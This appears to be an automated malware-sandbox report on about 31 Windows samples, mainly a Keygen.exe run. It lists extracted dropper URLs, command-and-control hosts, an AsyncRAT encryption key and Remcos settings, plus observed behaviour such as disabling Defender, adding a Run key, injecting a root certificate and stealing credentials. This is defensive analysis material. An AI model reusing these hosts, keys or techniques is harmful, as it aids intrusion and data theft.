Overview
overview
10Static
static
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
3ฺฺฺK...ฺฺ
windows10_x64
3ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
8Analysis
-
max time kernel
1803s -
max time network
1817s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
19-11-2020 13:14
Static task
static1
Behavioral task
behavioral1
Sample
08751be484e1572995ebb085df1c2c6372084d63a64dce7fab28130d79a6ea2d.dll
Resource
win10v20201028
Behavioral task
behavioral2
Sample
0a9f79abd48b95544d7e2b6658637d1eb23067a94e10bf06d05c9ecc73cf4b51.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
1.bin/1.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
2019-09-02_22-41-10.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
2b5e50bc3077610128051bc3e657c3f0e331fb8fed2559c6596911890ea866ba.dll
Resource
win10v20201028
Behavioral task
behavioral6
Sample
2c01b007729230c415420ad641ad92eb.exe
Resource
win10v20201028
Behavioral task
behavioral7
Sample
31.exe
Resource
win10v20201028
Behavioral task
behavioral8
Sample
3DMark 11 Advanced Edition.exe
Resource
win10v20201028
Behavioral task
behavioral9
Sample
42f972925508a82236e8533567487761.exe
Resource
win10v20201028
Behavioral task
behavioral10
Sample
42f972925508a82236e8533567487761(1).exe
Resource
win10v20201028
Behavioral task
behavioral11
Sample
5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
Resource
win10v20201028
Behavioral task
behavioral12
Sample
69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
Resource
win10v20201028
Behavioral task
behavioral13
Sample
6a9e7107c97762eb1196a64baeadb291.exe
Resource
win10v20201028
Behavioral task
behavioral14
Sample
905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe
Resource
win10v20201028
Behavioral task
behavioral15
Sample
948340be97cc69c2cf8e5c8327ee52a89eeb50095f978696c710ad773a46b654.exe
Resource
win10v20201028
Behavioral task
behavioral16
Sample
95560f1a465e8ba87a73f8e60a6657545073d55c3b5cfc2ffdaf3d69d46afcf9.dll
Resource
win10v20201028
Behavioral task
behavioral17
Sample
Archive.zip__ccacaxs2tbz2t6ob3e.exe
Resource
win10v20201028
Behavioral task
behavioral18
Sample
CVE-2018-15982_PoC.swf
Resource
win10v20201028
Behavioral task
behavioral19
Sample
CVWSHSetup[1].bin/WSHSetup[1].exe
Resource
win10v20201028
Behavioral task
behavioral20
Sample
DiskInternals_Uneraser_v5_keygen.exe
Resource
win10v20201028
Behavioral task
behavioral21
Sample
ForceOp 2.8.7 - By RaiSence.exe
Resource
win10v20201028
Behavioral task
behavioral22
Sample
HYDRA.exe
Resource
win10v20201028
Behavioral task
behavioral23
Sample
KLwC6vii.exe
Resource
win10v20201028
Behavioral task
behavioral24
Sample
Keygen.exe
Resource
win10v20201028
Behavioral task
behavioral25
Sample
Lonelyscreen.1.2.9.keygen.by.Paradox/Lonelyscreen.1.2.9.keygen.by.Paradox.exe
Resource
win10v20201028
Behavioral task
behavioral26
Sample
LtHv0O2KZDK4M637.exe
Resource
win10v20201028
Behavioral task
behavioral27
Sample
Magic_File_v3_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral28
Sample
OnlineInstaller.exe
Resource
win10v20201028
Behavioral task
behavioral29
Sample
Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe
Resource
win10v20201028
Behavioral task
behavioral30
Sample
SecuriteInfo.com.Gen.NN.ZexaF.34108.xy1@amqiedE.17985.exe
Resource
win10v20201028
Behavioral task
behavioral31
Sample
SecuriteInfo.com.Generic.mg.cde56cf0169830ee.29869.dll
Resource
win10v20201028
General
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://zxvbcrt.ug/zxcvb.exe
exe.dropper
http://zxvbcrt.ug/zxcvb.exe
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://bit.do/fqhHT
exe.dropper
http://bit.do/fqhHT
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://bit.do/fqhJv
exe.dropper
http://bit.do/fqhJv
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://pdshcjvnv.ug/zxcvb.exe
exe.dropper
http://pdshcjvnv.ug/zxcvb.exe
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://bit.do/fqhJD
exe.dropper
http://bit.do/fqhJD
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://rbcxvnb.ug/zxcvb.exe
exe.dropper
http://rbcxvnb.ug/zxcvb.exe
Extracted
Family
raccoon
Botnet
5e4db353b88c002ba6466c06437973619aad03b3
Attributes
-
url4cnc
https://telete.in/brikitiki
rc4.plain
rc4.plain
Extracted
Family
azorult
C2
http://195.245.112.115/index.php
Extracted
Family
asyncrat
Version
0.5.7B
C2
agentttt.ac.ug:6970
agentpurple.ac.ug:6970
Attributes
-
aes_key
16dw6EDbQkYZp5BTs7cmLUicVtOA4UQr
-
anti_detection
false
-
autorun
false
-
bdos
false
-
delay
Default
-
host
agentttt.ac.ug,agentpurple.ac.ug
-
hwid
3
- install_file
-
install_folder
%AppData%
-
mutex
AsyncMutex_6SI8OkPnk
-
pastebin_config
null
-
port
6970
-
version
0.5.7B
aes.plain
Extracted
Family
remcos
Version
2.7.2 Light
Botnet
xxxxxxxxxxx
C2
taenaia.ac.ug:6969
agentpapple.ac.ug:6969
Attributes
-
audio_folder
MicRecords
-
audio_path
%AppData%
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
install_path
%AppData%
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
cvxdsaxzcas-FPRVUD
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
Remcos
-
take_screenshot_option
false
-
take_screenshot_time
5
-
take_screenshot_title
wikipedia;solitaire;
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Contains code to disable Windows Defender ⋅ 10 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource yara_rule behavioral24/memory/4592-226-0x000000000040616E-mapping.dmp disable_win_def behavioral24/memory/4592-225-0x0000000000400000-0x000000000040C000-memory.dmp disable_win_def behavioral24/memory/1532-248-0x0000000000400000-0x0000000000408000-memory.dmp disable_win_def behavioral24/memory/1532-250-0x0000000000403BEE-mapping.dmp disable_win_def behavioral24/files/0x000200000001abc9-280.dat disable_win_def behavioral24/files/0x000200000001abc9-281.dat disable_win_def behavioral24/memory/3564-530-0x000000000040616E-mapping.dmp disable_win_def behavioral24/memory/3596-535-0x0000000000403BEE-mapping.dmp disable_win_def behavioral24/files/0x000300000001abe3-762.dat disable_win_def behavioral24/files/0x000300000001abe3-763.dat disable_win_def -
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Oski
Oski is an infostealer targeting browser data, crypto wallets.
-
Raccoon Stealer Payload ⋅ 2 IoCs
Processes:
resource yara_rule behavioral24/memory/4780-143-0x0000000000400000-0x0000000000497000-memory.dmp family_raccoon behavioral24/memory/5304-359-0x000000000043FA56-mapping.dmp family_raccoon -
Async RAT payload ⋅ 3 IoCs
Processes:
resource yara_rule behavioral24/memory/4580-229-0x000000000040C76E-mapping.dmp asyncrat behavioral24/memory/4580-227-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral24/memory/3528-515-0x000000000040C76E-mapping.dmp asyncrat -
ModiLoader First Stage ⋅ 1 IoCs
Processes:
resource yara_rule behavioral24/memory/4620-287-0x00000000041C0000-0x000000000421C000-memory.dmp modiloader_stage1 -
Blocklisted process makes network request ⋅ 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exeflow pid process 11 4452 powershell.exe 12 1108 powershell.exe 15 1108 powershell.exe 16 4452 powershell.exe 17 3552 powershell.exe 19 3552 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE ⋅ 32 IoCs
Processes:
Keygen.exexso.exenrp.exetnz.exeFGbfttrev.exeFDvbcgfert.exenrp.exeFDvbcgfert.exeFGbfttrev.exes87WswzUoo.exe9yX7jXtPyr.exerRJ4xmowfr.exe2YYlGiVB3V.exerRJ4xmowfr.exes87WswzUoo.exe2YYlGiVB3V.exe2YYlGiVB3V.exeddad3vxa.exeazchgftrq.exexso.exeBQ50kvtGsn.exeVVa1pEtZCG.exeqNP7mU6QPh.exeho25uMdeM0.exeBQ50kvtGsn.exeqNP7mU6QPh.exeho25uMdeM0.exeozchgftrq.exeazchgftrq.exeazchgftrq.exeozchgftrq.exettuqy3sf.exepid process 3224 Keygen.exe 2332 xso.exe 1584 nrp.exe 3540 tnz.exe 1632 FGbfttrev.exe 4260 FDvbcgfert.exe 4780 nrp.exe 4928 FDvbcgfert.exe 4232 FGbfttrev.exe 180 s87WswzUoo.exe 4620 9yX7jXtPyr.exe 3236 rRJ4xmowfr.exe 3948 2YYlGiVB3V.exe 4592 rRJ4xmowfr.exe 4580 s87WswzUoo.exe 1180 2YYlGiVB3V.exe 1532 2YYlGiVB3V.exe 4504 ddad3vxa.exe 5288 azchgftrq.exe 5304 xso.exe 6000 BQ50kvtGsn.exe 6060 VVa1pEtZCG.exe 6092 qNP7mU6QPh.exe 4040 ho25uMdeM0.exe 3528 BQ50kvtGsn.exe 3564 qNP7mU6QPh.exe 3596 ho25uMdeM0.exe 5904 ozchgftrq.exe 4024 azchgftrq.exe 1468 azchgftrq.exe 4808 ozchgftrq.exe 5568 ttuqy3sf.exe -
Loads dropped DLL ⋅ 18 IoCs
Processes:
nrp.exeFDvbcgfert.exexso.exeozchgftrq.exepid process 4780 nrp.exe 4928 FDvbcgfert.exe 4928 FDvbcgfert.exe 4928 FDvbcgfert.exe 4780 nrp.exe 4780 nrp.exe 4780 nrp.exe 4780 nrp.exe 4780 nrp.exe 5304 xso.exe 5304 xso.exe 5304 xso.exe 5304 xso.exe 5304 xso.exe 5304 xso.exe 4808 ozchgftrq.exe 4808 ozchgftrq.exe 4808 ozchgftrq.exe -
Reads user/profile data of local email clients ⋅ 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers ⋅ 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
ho25uMdeM0.exe2YYlGiVB3V.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" ho25uMdeM0.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 2YYlGiVB3V.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 2YYlGiVB3V.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting ⋅ 2 TTPs
-
Adds Run key to start application ⋅ 2 TTPs 1 IoCs
Processes:
9yX7jXtPyr.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Zsle = "C:\\Users\\Admin\\AppData\\Local\\elsZ.url" 9yX7jXtPyr.exe -
Checks installed software on the system ⋅ 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
TTPs:
-
Drops desktop.ini file(s) ⋅ 2 IoCs
Processes:
nrp.exexso.exedescription ioc process File created C:\Users\Admin\AppData\LocalLow\n9h9r91h8fna789q\desktop.ini nrp.exe File created C:\Users\Admin\AppData\LocalLow\n9h9r91h8fna789q\desktop.ini xso.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger ⋅ 6 IoCs
Processes:
nrp.exeFDvbcgfert.exeFGbfttrev.exepid process 4780 nrp.exe 4780 nrp.exe 4928 FDvbcgfert.exe 4928 FDvbcgfert.exe 4232 FGbfttrev.exe 4232 FGbfttrev.exe -
Suspicious use of SetThreadContext ⋅ 14 IoCs
Processes:
nrp.exeFDvbcgfert.exeFGbfttrev.exerRJ4xmowfr.exes87WswzUoo.exe2YYlGiVB3V.exexso.exeBQ50kvtGsn.exeqNP7mU6QPh.exeho25uMdeM0.exeazchgftrq.exeozchgftrq.exe9yX7jXtPyr.exeVVa1pEtZCG.exedescription pid process target process PID 1584 set thread context of 4780 1584 nrp.exe nrp.exe PID 4260 set thread context of 4928 4260 FDvbcgfert.exe FDvbcgfert.exe PID 1632 set thread context of 4232 1632 FGbfttrev.exe FGbfttrev.exe PID 3236 set thread context of 4592 3236 rRJ4xmowfr.exe rRJ4xmowfr.exe PID 180 set thread context of 4580 180 s87WswzUoo.exe s87WswzUoo.exe PID 3948 set thread context of 1532 3948 2YYlGiVB3V.exe 2YYlGiVB3V.exe PID 2332 set thread context of 5304 2332 xso.exe xso.exe PID 6000 set thread context of 3528 6000 BQ50kvtGsn.exe BQ50kvtGsn.exe PID 6092 set thread context of 3564 6092 qNP7mU6QPh.exe qNP7mU6QPh.exe PID 4040 set thread context of 3596 4040 ho25uMdeM0.exe ho25uMdeM0.exe PID 5288 set thread context of 1468 5288 azchgftrq.exe azchgftrq.exe PID 5904 set thread context of 4808 5904 ozchgftrq.exe ozchgftrq.exe PID 4620 set thread context of 3740 4620 9yX7jXtPyr.exe ieinstal.exe PID 6060 set thread context of 4496 6060 VVa1pEtZCG.exe ieinstal.exe -
Enumerates physical storage devices ⋅ 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry ⋅ 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
FDvbcgfert.exeozchgftrq.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString FDvbcgfert.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ozchgftrq.exe -
Delays execution with timeout.exe ⋅ 4 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exepid process 2388 timeout.exe 3956 timeout.exe 192 timeout.exe 4432 timeout.exe -
Kills process with taskkill ⋅ 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 4504 taskkill.exe 1368 taskkill.exe 804 taskkill.exe 2808 taskkill.exe -
Modifies registry class ⋅ 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings cmd.exe -
Modifies registry key ⋅ 1 TTPs 5 IoCs
TTPs:
Processes:
reg.exereg.exereg.exereg.exereg.exepid process 2260 reg.exe 340 reg.exe 5624 reg.exe 5664 reg.exe 1588 reg.exe -
Processes:
9yX7jXtPyr.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 9yX7jXtPyr.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 9yX7jXtPyr.exe -
Suspicious behavior: EnumeratesProcesses ⋅ 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exerRJ4xmowfr.exepid process 1108 powershell.exe 608 powershell.exe 4548 powershell.exe 4548 powershell.exe 4452 powershell.exe 1108 powershell.exe 1108 powershell.exe 608 powershell.exe 608 powershell.exe 4452 powershell.exe 4452 powershell.exe 4548 powershell.exe 1108 powershell.exe 4452 powershell.exe 4548 powershell.exe 608 powershell.exe 3552 powershell.exe 3552 powershell.exe 2100 powershell.exe 2100 powershell.exe 3552 powershell.exe 2100 powershell.exe 3552 powershell.exe 2100 powershell.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe -
Suspicious behavior: MapViewOfSection ⋅ 3 IoCs
Processes:
nrp.exeFDvbcgfert.exeFGbfttrev.exepid process 1584 nrp.exe 4260 FDvbcgfert.exe 1632 FGbfttrev.exe -
Suspicious use of AdjustPrivilegeToken ⋅ 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskkill.exewerfault.exes87WswzUoo.exerRJ4xmowfr.exerRJ4xmowfr.exe2YYlGiVB3V.exepowershell.exetaskkill.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exexso.exedescription pid process Token: SeDebugPrivilege 1108 powershell.exe Token: SeDebugPrivilege 608 powershell.exe Token: SeDebugPrivilege 4452 powershell.exe Token: SeDebugPrivilege 4548 powershell.exe Token: SeDebugPrivilege 3552 powershell.exe Token: SeDebugPrivilege 2100 powershell.exe Token: SeDebugPrivilege 1368 taskkill.exe Token: SeRestorePrivilege 4428 werfault.exe Token: SeBackupPrivilege 4428 werfault.exe Token: SeDebugPrivilege 180 s87WswzUoo.exe Token: SeDebugPrivilege 3236 rRJ4xmowfr.exe Token: SeDebugPrivilege 4592 rRJ4xmowfr.exe Token: SeDebugPrivilege 3948 2YYlGiVB3V.exe Token: SeDebugPrivilege 508 powershell.exe Token: SeDebugPrivilege 804 taskkill.exe Token: SeDebugPrivilege 4188 powershell.exe Token: SeIncreaseQuotaPrivilege 4188 powershell.exe Token: SeSecurityPrivilege 4188 powershell.exe Token: SeTakeOwnershipPrivilege 4188 powershell.exe Token: SeLoadDriverPrivilege 4188 powershell.exe Token: SeSystemProfilePrivilege 4188 powershell.exe Token: SeSystemtimePrivilege 4188 powershell.exe Token: SeProfSingleProcessPrivilege 4188 powershell.exe Token: SeIncBasePriorityPrivilege 4188 powershell.exe Token: SeCreatePagefilePrivilege 4188 powershell.exe Token: SeBackupPrivilege 4188 powershell.exe Token: SeRestorePrivilege 4188 powershell.exe Token: SeShutdownPrivilege 4188 powershell.exe Token: SeDebugPrivilege 4188 powershell.exe Token: SeSystemEnvironmentPrivilege 4188 powershell.exe Token: SeRemoteShutdownPrivilege 4188 powershell.exe Token: SeUndockPrivilege 4188 powershell.exe Token: SeManageVolumePrivilege 4188 powershell.exe Token: 33 4188 powershell.exe Token: 34 4188 powershell.exe Token: 35 4188 powershell.exe Token: 36 4188 powershell.exe Token: SeDebugPrivilege 4784 powershell.exe Token: SeDebugPrivilege 1776 powershell.exe Token: SeDebugPrivilege 3132 powershell.exe Token: SeDebugPrivilege 1292 powershell.exe Token: SeDebugPrivilege 4064 powershell.exe Token: SeDebugPrivilege 768 powershell.exe Token: SeDebugPrivilege 4624 powershell.exe Token: SeDebugPrivilege 944 powershell.exe Token: SeDebugPrivilege 372 powershell.exe Token: SeDebugPrivilege 1536 powershell.exe Token: SeDebugPrivilege 2872 powershell.exe Token: SeDebugPrivilege 4552 powershell.exe Token: SeDebugPrivilege 2332 xso.exe Token: SeIncreaseQuotaPrivilege 4784 powershell.exe Token: SeSecurityPrivilege 4784 powershell.exe Token: SeTakeOwnershipPrivilege 4784 powershell.exe Token: SeLoadDriverPrivilege 4784 powershell.exe Token: SeSystemProfilePrivilege 4784 powershell.exe Token: SeSystemtimePrivilege 4784 powershell.exe Token: SeProfSingleProcessPrivilege 4784 powershell.exe Token: SeIncBasePriorityPrivilege 4784 powershell.exe Token: SeCreatePagefilePrivilege 4784 powershell.exe Token: SeBackupPrivilege 4784 powershell.exe Token: SeRestorePrivilege 4784 powershell.exe Token: SeShutdownPrivilege 4784 powershell.exe Token: SeDebugPrivilege 4784 powershell.exe Token: SeSystemEnvironmentPrivilege 4784 powershell.exe -
Suspicious use of SetWindowsHookEx ⋅ 9 IoCs
Processes:
Keygen.exenrp.exetnz.exeFGbfttrev.exeFDvbcgfert.exerRJ4xmowfr.exeqNP7mU6QPh.exepid process 3224 Keygen.exe 1584 nrp.exe 3540 tnz.exe 1632 FGbfttrev.exe 4260 FDvbcgfert.exe 4592 rRJ4xmowfr.exe 4592 rRJ4xmowfr.exe 3564 qNP7mU6QPh.exe 3564 qNP7mU6QPh.exe -
Suspicious use of WriteProcessMemory ⋅ 64 IoCs
Processes:
Keygen.execmd.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exepowershell.exepowershell.exepowershell.exenrp.exedescription pid process target process PID 4776 wrote to memory of 3488 4776 Keygen.exe cmd.exe PID 4776 wrote to memory of 3488 4776 Keygen.exe cmd.exe PID 4776 wrote to memory of 3488 4776 Keygen.exe cmd.exe PID 3488 wrote to memory of 3224 3488 cmd.exe Keygen.exe PID 3488 wrote to memory of 3224 3488 cmd.exe Keygen.exe PID 3488 wrote to memory of 3224 3488 cmd.exe Keygen.exe PID 3488 wrote to memory of 3464 3488 cmd.exe mshta.exe PID 3488 wrote to memory of 3464 3488 cmd.exe mshta.exe PID 3488 wrote to memory of 3464 3488 cmd.exe mshta.exe PID 3488 wrote to memory of 4156 3488 cmd.exe mshta.exe PID 3488 wrote to memory of 4156 3488 cmd.exe mshta.exe PID 3488 wrote to memory of 4156 3488 cmd.exe mshta.exe PID 3488 wrote to memory of 4432 3488 cmd.exe timeout.exe PID 3488 wrote to memory of 4432 3488 cmd.exe timeout.exe PID 3488 wrote to memory of 4432 3488 cmd.exe timeout.exe PID 4156 wrote to memory of 608 4156 mshta.exe powershell.exe PID 4156 wrote to memory of 608 4156 mshta.exe powershell.exe PID 4156 wrote to memory of 608 4156 mshta.exe powershell.exe PID 3464 wrote to memory of 1108 3464 mshta.exe powershell.exe PID 3464 wrote to memory of 1108 3464 mshta.exe powershell.exe PID 3464 wrote to memory of 1108 3464 mshta.exe powershell.exe PID 3488 wrote to memory of 1892 3488 cmd.exe mshta.exe PID 3488 wrote to memory of 1892 3488 cmd.exe mshta.exe PID 3488 wrote to memory of 1892 3488 cmd.exe mshta.exe PID 1892 wrote to memory of 4452 1892 mshta.exe powershell.exe PID 1892 wrote to memory of 4452 1892 mshta.exe powershell.exe PID 1892 wrote to memory of 4452 1892 mshta.exe powershell.exe PID 3488 wrote to memory of 2008 3488 cmd.exe mshta.exe PID 3488 wrote to memory of 2008 3488 cmd.exe mshta.exe PID 3488 wrote to memory of 2008 3488 cmd.exe mshta.exe PID 2008 wrote to memory of 4548 2008 mshta.exe powershell.exe PID 2008 wrote to memory of 4548 2008 mshta.exe powershell.exe PID 2008 wrote to memory of 4548 2008 mshta.exe powershell.exe PID 3488 wrote to memory of 2388 3488 cmd.exe timeout.exe PID 3488 wrote to memory of 2388 3488 cmd.exe timeout.exe PID 3488 wrote to memory of 2388 3488 cmd.exe timeout.exe PID 3488 wrote to memory of 3604 3488 cmd.exe mshta.exe PID 3488 wrote to memory of 3604 3488 cmd.exe mshta.exe PID 3488 wrote to memory of 3604 3488 cmd.exe mshta.exe PID 3604 wrote to memory of 3552 3604 mshta.exe powershell.exe PID 3604 wrote to memory of 3552 3604 mshta.exe powershell.exe PID 3604 wrote to memory of 3552 3604 mshta.exe powershell.exe PID 3488 wrote to memory of 4684 3488 cmd.exe mshta.exe PID 3488 wrote to memory of 4684 3488 cmd.exe mshta.exe PID 3488 wrote to memory of 4684 3488 cmd.exe mshta.exe PID 4684 wrote to memory of 2100 4684 mshta.exe powershell.exe PID 4684 wrote to memory of 2100 4684 mshta.exe powershell.exe PID 4684 wrote to memory of 2100 4684 mshta.exe powershell.exe PID 4452 wrote to memory of 2332 4452 powershell.exe xso.exe PID 4452 wrote to memory of 2332 4452 powershell.exe xso.exe PID 4452 wrote to memory of 2332 4452 powershell.exe xso.exe PID 1108 wrote to memory of 1584 1108 powershell.exe nrp.exe PID 1108 wrote to memory of 1584 1108 powershell.exe nrp.exe PID 1108 wrote to memory of 1584 1108 